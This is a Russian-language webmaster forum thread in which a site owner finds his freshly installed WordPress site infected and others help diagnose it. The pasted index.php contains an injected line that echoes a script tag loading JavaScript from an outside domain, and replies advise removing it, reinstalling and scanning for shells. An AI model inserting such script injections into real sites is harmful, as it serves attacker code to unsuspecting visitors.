- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
На днях решил попробовать сделать сайт на WordPress. Установил на домене http://igor.net.ru/ движек, поставил несколько плагинов. А вчера случайно зашел не со своего компьютера туда.
И вот что увидел
Как удалить этот вирус и откуда он мог там взяться?
А сам движок и плагины откуда брали? Надёжное место?
Слишком много вариантов, чтобы что-то предполагать. На рабочей машине вирусов нет? Файлзиллой не пользуетесь? Сейчас участились случаи кражи паролей от фтп через фтп-менеджеры. Может быть хостер дырявый или сам движок/плагин/тема.
А сам движок и плагины откуда брали? Надёжное место?
Движек входил в список движков, которые можно было устанавливать на хостинге. Я просто выбрал этот движек из списка и нажал установить.
---------- Добавлено 12.05.2012 в 00:07 ----------
Плагины выбирал в админке вордпреса. А откуда они там скачиваются?
---------- Добавлено 12.05.2012 в 00:08 ----------
На рабочей машине вирусы не обнаружены. Пользовался тотал командером.
Ftp пользововались через тотал командер? Скорее всего у вас украли логин и пароль ftp! Такое часто бывает.
Первым делом закройте доступ по фтп, потом посмотрите индексный файл, скорее всего там вредоносный код прописан.
Движек входил в список движков, которые можно было устанавливать на хостинге. Я просто выбрал этот движек из списка и нажал установить. Плагины выбирал в админке вордпреса. А откуда они там скачиваются?
Может хостер ставит какую-то старую версию Вордпресса? Сейчас актуальна, кажись, версия 3.3.2. Может проще проверить свой комп на наличие врагов способных увести пароли от фтп или админки движка, да качнуть и поставить свежий двиг с оф. сайта?
потом посмотрите индексный файл
Вот его содержание:
/**
* Front to the WordPress application. This file doesn't do anything, but loads
* wp-blog-header.php which does and tells WordPress to load the theme.
*
* @package WordPress
*/
/**
* Tells WordPress to load the WordPress theme and output it.
*
* @var bool
*/
define('WP_USE_THEMES', true);
/** Loads the WordPress Environment and Template */
require('./wp-blog-header.php');
echo '<script src="http://static.homedns.org/rss.js"></script>';
?>
echo '<script src="http://static.homedns.org/rss.js"></script>';
в стандартном индексе такого нет =)
в стандартном индексе такого нет =)
вот что мне попалось /ru/forum/comment/10383607
---------- Добавлено 12.05.2012 в 04:22 ----------
Удалил эту строчку, теперь осталось понять как она там очутилась.
Ingvarr, Если сборку вп качали не с офф сайта, лучше заново поставить офф версию.
Удалить(заменить) ненадёжные плагины.
Проверить файлы на наличие шелов, например айболитом(http://revisium.com/ai/)
Ingvarr, Если сборку вп качали не с офф сайта
Я её вообще ниоткуда не качал, её хостинг предоставляет
---------- Добавлено 12.05.2012 в 04:37 ----------
Ingvarr,
Удалить(заменить) ненадёжные плагины.
Как определить какой плагин ненадежный?
---------- Добавлено 12.05.2012 в 04:42 ----------
Вот еще нашел http://opencartforum.ru/topic/8994-если-у-вас-не-работает-кнопка-купить-вирус-на-с/page__hl__вирус__fromsearch__1
Та же проблема и совсем недавно
ТС, расслабьтесь. :)
А именно этот адрес:
;)